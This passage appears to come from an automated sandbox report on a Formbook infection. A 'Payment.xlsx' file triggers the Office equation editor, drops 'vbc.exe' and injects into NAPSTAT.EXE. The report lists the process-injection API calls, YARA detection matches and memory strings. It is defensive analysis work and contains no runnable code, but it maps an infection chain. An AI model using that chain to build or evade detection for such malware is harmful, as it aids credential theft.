          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FC48 NtSetInformationFile,7_2_00B2FC48
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B31D80 NtSuspendThread,7_2_00B31D80
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FD5C NtEnumerateKey,7_2_00B2FD5C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FE24 NtWriteVirtualMemory,7_2_00B2FE24
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FFFC NtCreateProcessEx,7_2_00B2FFFC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FF34 NtQueueApcThread,7_2_00B2FF34
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF00C4 NtCreateFile,LdrInitializeThunk,9_2_01FF00C4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF07AC NtCreateMutant,LdrInitializeThunk,9_2_01FF07AC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEF9F0 NtClose,LdrInitializeThunk,9_2_01FEF9F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEF900 NtReadFile,LdrInitializeThunk,9_2_01FEF900
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_01FEFBB8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01FEFB68
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFB50 NtCreateKey,LdrInitializeThunk,9_2_01FEFB50
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_01FEFAE8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_01FEFAD0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFAB8 NtQueryValueKey,LdrInitializeThunk,9_2_01FEFAB8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01FEFDC0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFD8C NtDelayExecution,LdrInitializeThunk,9_2_01FEFD8C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFC60 NtMapViewOfSection,LdrInitializeThunk,9_2_01FEFC60
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFFB4 NtCreateSection,LdrInitializeThunk,9_2_01FEFFB4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_01FEFED0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF01D4 NtSetValueKey,9_2_01FF01D4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF1148 NtOpenThread,9_2_01FF1148
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF010C NtOpenDirectoryObject,9_2_01FF010C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF10D0 NtOpenProcessToken,9_2_01FF10D0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF0078 NtResumeThread,9_2_01FF0078
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF0060 NtQuerySection,9_2_01FF0060
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF0048 NtProtectVirtualMemory,9_2_01FF0048
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEF938 NtWriteFile,9_2_01FEF938
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF1930 NtSetContextThread,9_2_01FF1930
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEF8CC NtWaitForSingleObject,9_2_01FEF8CC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFBE8 NtQueryVirtualMemory,9_2_01FEFBE8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFA50 NtEnumerateValueKey,9_2_01FEFA50
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFA20 NtQueryInformationFile,9_2_01FEFA20
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF1D80 NtSuspendThread,9_2_01FF1D80
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFD5C NtEnumerateKey,9_2_01FEFD5C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFC90 NtUnmapViewOfSection,9_2_01FEFC90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFC48 NtSetInformationFile,9_2_01FEFC48
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF0C40 NtGetContextThread,9_2_01FF0C40
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFC30 NtOpenProcess,9_2_01FEFC30
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFFFC NtCreateProcessEx,9_2_01FEFFFC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFF34 NtQueueApcThread,9_2_01FEFF34
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFEA0 NtReadVirtualMemory,9_2_01FEFEA0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFE24 NtWriteVirtualMemory,9_2_01FEFE24
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_000981B0 NtCreateFile,9_2_000981B0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00098260 NtReadFile,9_2_00098260
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_000982E0 NtClose,9_2_000982E0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00098390 NtAllocateVirtualMemory,9_2_00098390
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00098392 NtAllocateVirtualMemory,9_2_00098392
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003913BC4_2_003913BC
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0039D8BB4_2_0039D8BB
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0039D2CF4_2_0039D2CF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003913444_2_00391344
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0039CBD04_2_0039CBD0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00471BF44_2_00471BF4
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00471C5A4_2_00471C5A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004719E74_2_004719E7
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004715BF4_2_004715BF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E04484_2_007E0448
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E44184_2_007E4418
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E65E04_2_007E65E0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E66F84_2_007E66F8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E57554_2_007E5755
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E38B04_2_007E38B0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E4CC94_2_007E4CC9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E8DD94_2_007E8DD9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E80E04_2_007E80E0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E80D04_2_007E80D0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E51704_2_007E5170
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E83D84_2_007E83D8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E04384_2_007E0438
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007ED4284_2_007ED428
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E64FC4_2_007E64FC
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E75484_2_007E7548
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E75384_2_007E7538
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E66634_2_007E6663
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E66C84_2_007E66C8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E87704_2_007E8770
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E87604_2_007E8760
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E47014_2_007E4701
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007ED8C04_2_007ED8C0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E98994_2_007E9899
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E89C84_2_007E89C8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E89B84_2_007E89B8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E6A074_2_007E6A07
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007EDB584_2_007EDB58
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E8BF84_2_007E8BF8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007EEED04_2_007EEED0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007EEFD04_2_007EEFD0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0039AC504_2_0039AC50
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003911704_2_00391170
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003912B04_2_003912B0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B9447_2_0041B944
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041BB847_2_0041BB84
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C4B7_2_00408C4B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C507_2_00408C50
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041BCF57_2_0041BCF5
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C5ED7_2_0041C5ED
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B70F7_2_0041B70F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B3E0C67_2_00B3E0C6
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B6D0057_2_00B6D005
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B5905A7_2_00B5905A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B430407_2_00B43040
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B3E2E97_2_00B3E2E9
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BE12387_2_00BE1238
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B663DB7_2_00B663DB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B3F3CF7_2_00B3F3CF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B423057_2_00B42305
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8A37B7_2_00B8A37B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B473537_2_00B47353
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B754857_2_00B75485
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B514897_2_00B51489
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B7D47D7_2_00B7D47D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B5C5F07_2_00B5C5F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B4351F7_2_00B4351F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B865407_2_00B86540
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B446807_2_00B44680
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B4E6C17_2_00B4E6C1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BE26227_2_00BE2622
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B4C7BC7_2_00B4C7BC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BC579A7_2_00BC579A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B757C37_2_00B757C3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BDF8EE7_2_00BDF8EE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B6286D7_2_00B6286D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B4C85C7_2_00B4C85C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B429B27_2_00B429B2
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BE098E7_2_00BE098E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B569FE7_2_00B569FE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BC59557_2_00BC5955
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BF3A837_2_00BF3A83
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BECBA47_2_00BECBA4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B3FBD77_2_00B3FBD7
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BCDBDA7_2_00BCDBDA
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B67B007_2_00B67B00
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BDFDDD7_2_00BDFDDD
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B70D3B7_2_00B70D3B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B4CD5B7_2_00B4CD5B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B72E2F7_2_00B72E2F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B5EE4C7_2_00B5EE4C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B50F3F7_2_00B50F3F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B6DF7C7_2_00B6DF7C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020A12389_2_020A1238
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020023059_2_02002305
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FFE0C69_2_01FFE0C6
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020073539_2_02007353
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0204A37B9_2_0204A37B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020263DB9_2_020263DB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0202D0059_2_0202D005
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FFF3CF9_2_01FFF3CF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020030409_2_02003040
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0201905A9_2_0201905A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FFE2E99_2_01FFE2E9
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020A26229_2_020A2622
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0204A6349_2_0204A634
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020046809_2_02004680
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0200E6C19_2_0200E6C1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0208579A9_2_0208579A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0200C7BC9_2_0200C7BC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020357C39_2_020357C3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0203D47D9_2_0203D47D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020354859_2_02035485
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020114899_2_02011489
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0200351F9_2_0200351F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020465409_2_02046540
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0201C5F09_2_0201C5F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B3A839_2_020B3A83
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02027B009_2_02027B00
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020ACBA49_2_020ACBA4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0208DBDA9_2_0208DBDA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FFFBD79_2_01FFFBD7
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0200C85C9_2_0200C85C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0202286D9_2_0202286D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0209F8EE9_2_0209F8EE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020859559_2_02085955
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020A098E9_2_020A098E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020029B29_2_020029B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020169FE9_2_020169FE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02032E2F9_2_02032E2F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0201EE4C9_2_0201EE4C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02010F3F9_2_02010F3F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0202DF7C9_2_0202DF7C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02030D3B9_2_02030D3B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0200CD5B9_2_0200CD5B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0209FDDD9_2_0209FDDD
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009C5ED9_2_0009C5ED
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009B9449_2_0009B944
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009BB849_2_0009BB84
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00088C4B9_2_00088C4B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00088C509_2_00088C50
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009BCF59_2_0009BCF5
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00082D909_2_00082D90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00082FB09_2_00082FB0
          Source: Payment.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B83F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00BAF970 appears 81 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B8373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B3DF5C appears 118 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B3E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 01FFDF5C appears 118 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0204373B appears 238 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 02043F92 appears 108 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0206F970 appears 81 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 01FFE2A8 appears 38 times
          Source: so[1].exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: so[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@14/8@7/7
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Payment.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF288.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
